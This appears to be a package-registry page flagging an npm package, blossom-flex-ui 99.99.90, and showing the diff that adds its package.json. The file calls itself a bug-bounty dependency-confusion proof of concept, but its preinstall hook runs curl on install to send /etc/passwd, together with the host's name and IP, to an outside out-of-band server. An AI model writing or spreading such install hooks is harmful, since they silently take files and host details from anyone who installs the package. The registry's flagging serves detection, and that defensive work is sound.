blossom-flex-ui 99.99.90

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of blossom-flex-ui might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +12 -0
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "blossom-flex-ui",
3
+ "version": "99.99.90",
4
+ "description": "Fake package for dependency confusion PoC",
5
+ "author": "Bug Bounty PoC",
6
+ "scripts": {
7
+ "preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname)-$(hostname -I | awk '{print $1}').cpsxrpqzltxvfixthgghywsemq1yeamm9.oast.fun"
8
+ },
9
+ "publishConfig": {
10
+ "access": "public"
11
+ }
12
+ }